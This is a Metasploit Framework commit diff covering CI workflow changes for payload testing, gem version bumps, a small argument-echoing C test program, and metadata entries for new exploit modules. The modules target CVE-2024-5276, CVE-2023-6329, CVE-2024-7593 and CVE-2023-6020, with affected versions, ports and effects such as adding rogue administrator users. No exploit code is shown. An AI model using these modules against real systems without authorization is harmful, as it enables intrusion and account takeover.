automatic module_metadata_base.json update

Land #19455 , Minor fix for SPIP BigUp Unauthenticated RCE
fix(modules): spip_bigup_unauth_rce minor fix
2024-09-11 11:34:27 -05:00 · 2024-09-11 18:18:16 +02:00 · 2024-09-11 11:46:52 -04:00 · 2024-09-11 09:58:11 -05:00 · 2024-09-11 10:29:12 -04:00 · 2024-09-11 09:19:17 -05:00
158 changed files with 9404 additions and 2218 deletions
@@ -22,6 +22,16 @@ permissions:
  statuses: none

 on:
+  workflow_dispatch:
+    inputs:
+      metasploitPayloadsCommit:
+        description: 'metasploit-payloads branch would like to test'
+        required: true
+        default: 'master'
+      mettleCommit:
+        description: 'mettle branch you would like to test'
+        required: true
+        default: 'master'
  push:
    branches-ignore:
      - gh-pages
@@ -81,15 +91,16 @@ jobs:

    runs-on: ${{ matrix.os }}

-    timeout-minutes: 25
+    timeout-minutes: 50

    env:
      RAILS_ENV: test
+      metasploitPayloadsCommit: ${{ github.event.inputs.metasploitPayloadsCommit || 'master' }}
+      mettleCommit: ${{ github.event.inputs.mettleCommit|| 'master' }}
      HOST_RUNNER_IMAGE: ${{ matrix.os }}
      METERPRETER: ${{ matrix.meterpreter.name }}
      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
-      # pcaprub skipped until new version released: https://github.com/pcaprub/pcaprub/issues/70
-      BUNDLE_WITHOUT: "coverage development pcaprub"
+      BUNDLE_WITHOUT: "coverage development"

    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
    steps:
@@ -130,16 +141,58 @@ jobs:
          dir %WINDIR%
          type %WINDIR%\\system32\\drivers\\etc\\hosts

-      - name: Checkout code
-        uses: actions/checkout@v4
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
+      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)

-      # pcaprub skipped until new version released: https://github.com/pcaprub/pcaprub/issues/70
-      - name: Remove pcaprub dependency
-        shell: pwsh
-        if: runner.os == 'Windows'
+      - name: Install Docker - macOS
+        if: ${{ ( matrix.meterpreter.name == 'java') && (runner.os == 'macos' ) && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
        run: |
-          Set-Content -Path "Gemfile.lock" -Value (Get-Content -Path "Gemfile.lock" | Select-String -Pattern 'pcaprub' -NotMatch | Select-String -Pattern 'packetfu' -NotMatch)
-          Set-Content -Path "metasploit-framework.gemspec" -Value (Get-Content -Path "metasploit-framework.gemspec" | Select-String -Pattern 'pcaprub' -NotMatch | Select-String -Pattern 'packetfu' -NotMatch)
+          brew install docker
+          colima delete
+          colima start --arch x86_64
+
+      - name: Checkout mettle
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/mettle
+          path: mettle
+          ref: ${{ env.mettleCommit }}
+
+      - name: Get mettle version
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          echo "METTLE_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: mettle
+
+      - name: Prerequisite mettle gem setup
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          set -x
+          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
+        working-directory: mettle
+
+      - name: Compile mettle payloads
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
+          rake build
+        working-directory: mettle
+
+      - name: Compile mettle payloads - macOS
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          make TARGET=x86_64-apple-darwin
+          rake build
+        working-directory: mettle
+
+      - name: Checkout metasploit-framework code
+        uses: actions/checkout@v4
+        with:
+          path: metasploit-framework

      - name: Setup Ruby
        env:
@@ -149,11 +202,66 @@ jobs:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
          cache-version: 4
+          working-directory: metasploit-framework
          # Github actions with Ruby requires Bundler 2.2.18+
          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
          bundler: 2.2.33

-      - name: acceptance
+      - name: Move mettle gem into framework
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'mettle-testing-branch')) }}
+        run: |
+          cp ./mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem ./metasploit-framework
+        working-directory: metasploit-framework
+
+      - name: Install mettle gem
+        if: ${{ matrix.meterpreter.name == 'mettle' && (contains(github.event.issue.labels.*.name, 'payload-testing-mettle-branch')) }}
+        run: |
+          set -x
+          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
+          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '${{ env.METTLE_VERSION }}'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
+          bundle config unset deployment
+          bundle update metasploit_payloads-mettle
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Checkout metasploit-payloads
+        if: contains(github.event.issue.labels.*.name, 'payload-testing-branch')
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ env.metasploitPayloadsCommit }}
+
+      - name: Build Java and Android payloads
+        if: ${{ (matrix.meterpreter.name == 'java') && (runner.os != 'Windows') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch')) }}
+        run: |
+          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/java && make clean && make android && mvn -P deploy package"
+
+      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
+        shell: cmd
+        if: ${{ (runner.os == 'Windows') && (matrix.os == 'windows-2019') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch')) }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
+        shell: cmd
+        if: ${{ (runner.os == 'Windows') && (matrix.os == 'windows-2022') && (contains(github.event.issue.labels.*.name, 'payload-testing-branch'))}}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build PHP, Python and Windows payloads
+        if: ${{ ((matrix.meterpreter.name == 'php') || (matrix.meterpreter.name == 'python') || (runner.os == 'Windows')) && (contains(github.event.issue.labels.*.name, 'payload-testing-branch'))}}
+        run: |
+          make install-php install-python install-windows
+        working-directory: metasploit-payloads
+
+      - name: Acceptance
        env:
          SPEC_HELPER_LOAD_METASPLOIT: false
          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
@@ -166,6 +274,7 @@ jobs:
        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
        run: |
          bundle exec rspec spec/acceptance/meterpreter_spec.rb
+        working-directory: metasploit-framework

      - name: Archive results
        if: always()
@@ -173,7 +282,7 @@ jobs:
        with:
          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
-          path: tmp/allure-raw-data
+          path: metasploit-framework/tmp/allure-raw-data

  # Generate a final report from the previous test results
  report:
@@ -66,9 +66,9 @@ jobs:
          - '3.2'
        os:
          - ubuntu-latest
-        docker_image:
-          - mcr.microsoft.com/mssql/server:2022-latest
-          - mcr.microsoft.com/mssql/server:2019-latest
+        docker_image: []
+#          - mcr.microsoft.com/mssql/server:2022-latest
+#          - mcr.microsoft.com/mssql/server:2019-latest

    env:
      RAILS_ENV: test
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.6
+  TargetRubyVersion: 2.7
  SuggestExtensions: false
  NewCops: disable

@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.19)
+    metasploit-framework (6.4.26)
      aarch64
      abbrev
      actionpack (~> 7.0.0)
@@ -190,11 +190,11 @@ GEM
    bootsnap (1.18.3)
      msgpack (~> 1.2)
    bson (5.0.0)
-    builder (3.2.4)
+    builder (3.3.0)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.3.1)
+    concurrent-ruby (1.3.4)
    cookiejar (0.3.4)
    crass (1.0.6)
    csv (3.3.0)
@@ -218,7 +218,7 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.12.0)
+    erubi (1.13.0)
    eventmachine (1.2.7)
    factory_bot (6.4.6)
      activesupport (>= 5.0.0)
@@ -312,7 +312,7 @@ GEM
      mime-types-data (~> 3.2015)
    mime-types-data (3.2024.0604)
    mini_portile2 (2.8.7)
-    minitest (5.23.1)
+    minitest (5.25.1)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
@@ -334,7 +334,7 @@ GEM
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.3)
-    nokogiri (1.16.5)
+    nokogiri (1.16.7)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.0)
@@ -352,7 +352,7 @@ GEM
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
-    pcaprub (0.13.2)
+    pcaprub (0.13.3)
    pdf-reader (2.12.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
@@ -369,7 +369,7 @@ GEM
    public_suffix (5.0.5)
    puma (6.4.2)
      nio4r (~> 2.0)
-    racc (1.8.0)
+    racc (1.8.1)
    rack (2.2.9)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
@@ -450,8 +450,8 @@ GEM
    rex-text (0.2.58)
    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.8)
-      strscan (>= 3.0.9)
+    rexml (3.3.6)
+      strscan
    rkelly-remix (0.0.7)
    rspec (3.13.0)
      rspec-core (~> 3.13.0)
@@ -459,13 +459,13 @@ GEM
      rspec-mocks (~> 3.13.0)
    rspec-core (3.13.0)
      rspec-support (~> 3.13.0)
-    rspec-expectations (3.13.0)
+    rspec-expectations (3.13.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
    rspec-mocks (3.13.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (6.1.2)
+    rspec-rails (6.1.4)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
      railties (>= 6.1)
@@ -566,7 +566,7 @@ GEM
    xmlrpc (0.3.3)
      webrick
    yard (0.9.36)
-    zeitwerk (2.6.15)
+    zeitwerk (2.6.17)

 PLATFORMS
  ruby
@@ -30,12 +30,12 @@ bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.3, MIT
 bson, 5.0.0, "Apache 2.0"
-builder, 3.2.4, MIT
-bundler, 2.1.4, MIT
+builder, 3.3.0, MIT
+bundler, 2.2.3, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.3.1, MIT
+concurrent-ruby, 1.3.4, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.0, "ruby, Simplified BSD"
@@ -50,7 +50,7 @@ drb, 2.2.1, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.12.0, MIT
+erubi, 1.13.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.4.6, MIT
 factory_bot_rails, 6.4.3, MIT
@@ -86,7 +86,7 @@ memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.2, "New BSD"
 metasploit-credential, 6.0.9, "New BSD"
-metasploit-framework, 6.4.19, "New BSD"
+metasploit-framework, 6.4.26, "New BSD"
 metasploit-model, 5.0.2, "New BSD"
 metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.3, "New BSD"
@@ -95,7 +95,7 @@ method_source, 1.1.0, MIT
 mime-types, 3.5.2, MIT
 mime-types-data, 3.2024.0604, MIT
 mini_portile2, 2.8.7, MIT
-minitest, 5.23.1, MIT
+minitest, 5.25.1, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
@@ -111,7 +111,7 @@ net-ssh, 7.2.3, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.3, "MIT, Simplified BSD"
-nokogiri, 1.16.5, MIT
+nokogiri, 1.16.7, MIT
 nori, 2.7.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -121,14 +121,14 @@ packetfu, 2.0.0, "New BSD"
 parallel, 1.24.0, MIT
 parser, 3.3.2.0, MIT
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.13.2, LGPL-2.1
+pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.12.0, MIT
 pg, 1.5.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 5.0.5, MIT
 puma, 6.4.2, "New BSD"
-racc, 1.8.0, "ruby, Simplified BSD"
+racc, 1.8.1, "ruby, Simplified BSD"
 rack, 2.2.9, MIT
 rack-protection, 3.2.0, MIT
 rack-test, 2.1.0, MIT
@@ -162,13 +162,13 @@ rex-sslscan, 0.1.10, "New BSD"
 rex-struct2, 0.1.4, "New BSD"
 rex-text, 0.2.58, "New BSD"
 rex-zip, 0.1.5, "New BSD"
-rexml, 3.2.8, "Simplified BSD"
+rexml, 3.3.6, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
 rspec-core, 3.13.0, MIT
-rspec-expectations, 3.13.0, MIT
+rspec-expectations, 3.13.2, MIT
 rspec-mocks, 3.13.1, MIT
-rspec-rails, 6.1.2, MIT
+rspec-rails, 6.1.4, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.13.1, MIT
 rubocop, 1.64.1, MIT
@@ -215,4 +215,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.36, MIT
-zeitwerk, 2.6.15, MIT
+zeitwerk, 2.6.17, MIT
@@ -0,0 +1,33 @@
+## Setup
+
+This contains setup steps used for acceptance testing of the `cmd_exec` API. We will make use of the gcc docker image to 
+build out the C binaries to then be uploaded to the host machine, so they can be used as part of the `cmd_exec` 
+create process API.
+
+This directory contains:
+- C executable `show_args.c`
+This file is used as part of the `cmd_exec` testing as it requires a file to take args, then loop over them and output 
+those args back to the user.
+
+- Makefile to build the binaries `makefile.mk`
+This file is used to create the binaries for both Windows and Linux that the docker command below will make use of.
+
+- Precompiled binaries for Windows
+  - `show_args.exe`
+
+- Precompiled binaries for Linux and Mettle
+  - `show_args`
+
+- Precompiled binaries for macOS
+  - `show_args_macos`
+
+## Compile binaries locally
+
+We make use of gcc for this: https://hub.docker.com/_/gcc
+
+- Run:
+```shell
+docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:11.4.0 /bin/bash -c "apt update && apt install -y gcc-mingw-w64 && make all -f makefile.mk"
+```
+
+You will need to compile the OSX payload separately on an OSX machine, Docker is not supported.
@@ -0,0 +1,5 @@
+all: show_args_linux show_args_windows
+show_args_linux: show_args.c
+	cc show_args.c -o show_args_linux
+show_args_windows: show_args.c
+	x86_64-w64-mingw32-gcc show_args.c -o show_args.exe
@@ -0,0 +1,7 @@
+int printf(const char *format, ...);
+
+int main(int argc, char *argv[]) {
+    for (int i = 0; i < argc; i++) {
+        printf("%s\n", argv[i]);
+    }
+}
@@ -62,3 +62,4 @@ file-manager-advanced-shortcode
 royal-elementor-addons
 backup-backup
 hash-form
+give
@@ -2233,6 +2233,69 @@

    ]
  },
+  "auxiliary_admin/http/fortra_filecatalyst_workflow_sqli": {
+    "name": "Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)",
+    "fullname": "auxiliary/admin/http/fortra_filecatalyst_workflow_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-06-25",
+    "type": "auxiliary",
+    "author": [
+      "Tenable",
+      "Michael Heinzl"
+    ],
+    "description": "This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135, by adding a new\n          administrative user to the web interface of the application.",
+    "references": [
+      "CVE-2024-5276",
+      "URL-https://www.tenable.com/security/research/tra-2024-25",
+      "URL-https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-08-16 14:12:41 +0000",
+    "path": "/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/fortra_filecatalyst_workflow_sqli",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_admin/http/gitlab_password_reset_account_takeover": {
    "name": "GitLab Password Reset Account Takeover",
    "fullname": "auxiliary/admin/http/gitlab_password_reset_account_takeover",
@@ -2580,6 +2643,68 @@
      }
    ]
  },
+  "auxiliary_admin/http/idsecure_auth_bypass": {
+    "name": "Control iD iDSecure Authentication Bypass (CVE-2023-6329)",
+    "fullname": "auxiliary/admin/http/idsecure_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-11-27",
+    "type": "auxiliary",
+    "author": [
+      "Michael Heinzl",
+      "Tenable"
+    ],
+    "description": "This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an\n          unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.",
+    "references": [
+      "CVE-2023-6329",
+      "URL-https://www.tenable.com/security/research/tra-2023-36"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 30443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-08-19 21:17:16 +0000",
+    "path": "/modules/auxiliary/admin/http/idsecure_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/idsecure_auth_bypass",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_admin/http/iis_auth_bypass": {
    "name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass",
    "fullname": "auxiliary/admin/http/iis_auth_bypass",
@@ -2739,6 +2864,70 @@

    ]
  },
+  "auxiliary_admin/http/ivanti_vtm_admin": {
+    "name": "Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)",
+    "fullname": "auxiliary/admin/http/ivanti_vtm_admin",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-08-05",
+    "type": "auxiliary",
+    "author": [
+      "Michael Heinzl",
+      "ohnoisploited",
+      "mxalias"
+    ],
+    "description": "This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new\n          administrative user to the web interface of the application.\n\n          Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.",
+    "references": [
+      "PACKETSTORM-179906",
+      "CVE-2024-7593",
+      "URL-https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-08-16 15:43:34 +0000",
+    "path": "/modules/auxiliary/admin/http/ivanti_vtm_admin.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/ivanti_vtm_admin",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_admin/http/jboss_bshdeployer": {
    "name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",
    "fullname": "auxiliary/admin/http/jboss_bshdeployer",
@@ -3753,7 +3942,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-09-15 16:35:55 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -3823,7 +4012,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-09-15 16:35:55 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_r6700_pass_reset",
@@ -8203,7 +8392,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass",
@@ -22157,7 +22346,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-02-15 10:47:30 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess.rb",
    "is_install_path": true,
    "ref_name": "gather/grandstream_ucm62xx_sql_account_guess",
@@ -22690,7 +22879,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-06-06 14:53:28 +0000",
    "path": "/modules/auxiliary/gather/ie_sandbox_findfiles.rb",
    "is_install_path": true,
    "ref_name": "gather/ie_sandbox_findfiles",
@@ -23532,7 +23721,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-06-18 17:39:06 +0000",
+    "mod_time": "2024-08-23 16:49:30 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -23834,7 +24023,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-07-18 11:56:22 +0000",
+    "mod_time": "2024-07-19 12:33:13 +0000",
    "path": "/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb",
    "is_install_path": true,
    "ref_name": "gather/magento_xxe_cve_2024_34102",
@@ -25272,7 +25461,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-08-15 15:55:23 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/gather/prometheus_node_exporter_gather.rb",
    "is_install_path": true,
    "ref_name": "gather/prometheus_node_exporter_gather",
@@ -25700,6 +25889,69 @@

    ]
  },
+  "auxiliary_gather/ray_lfi_cve_2023_6020": {
+    "name": "Ray static arbitrary file read",
+    "fullname": "auxiliary/gather/ray_lfi_cve_2023_6020",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-11-15",
+    "type": "auxiliary",
+    "author": [
+      "byt3bl33d3r <marcello@protectai.com>",
+      "danmcinerney <dan@protectai.com>",
+      "Takahiro Yokoyama"
+    ],
+    "description": "Ray before 2.8.1 is vulnerable to a local file inclusion.",
+    "references": [
+      "CVE-2023-6020",
+      "URL-https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/",
+      "URL-https://github.com/protectai/ai-exploits/tree/main/ray"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8265,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-08-20 08:15:16 +0000",
+    "path": "/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb",
+    "is_install_path": true,
+    "ref_name": "gather/ray_lfi_cve_2023_6020",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_gather/redis_extractor": {
    "name": "Redis Extractor",
    "fullname": "auxiliary/gather/redis_extractor",
@@ -33756,7 +34008,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-09-18 06:56:18 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/scanner/http/emby_ssrf_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/emby_ssrf_scanner",
@@ -34755,7 +35007,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/fortimail_login_bypass_detection",
@@ -35123,7 +35375,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-05-03 10:45:37 +0000",
+    "mod_time": "2024-08-10 12:06:20 +0000",
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
@@ -37150,7 +37402,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-05-03 10:45:37 +0000",
+    "mod_time": "2024-08-01 15:09:20 +0000",
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
@@ -39943,7 +40195,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2024-06-06 14:53:28 +0000",
    "path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_mass_assignment",
@@ -51718,7 +51970,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2024-06-06 14:53:28 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_icm_urlscan",
@@ -53376,7 +53628,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-08-01 15:11:57 +0000",
+    "mod_time": "2024-07-24 16:42:43 +0000",
    "path": "/modules/auxiliary/scanner/scada/bacnet_l3.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/bacnet_l3",
@@ -63439,7 +63691,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-01-07 14:06:31 +0000",
+    "mod_time": "2024-09-05 11:00:56 +0000",
    "path": "/modules/encoders/php/base64.rb",
    "is_install_path": true,
    "ref_name": "php/base64",
@@ -63451,6 +63703,74 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "encoder_php/hex": {
+    "name": "PHP Hex Encoder",
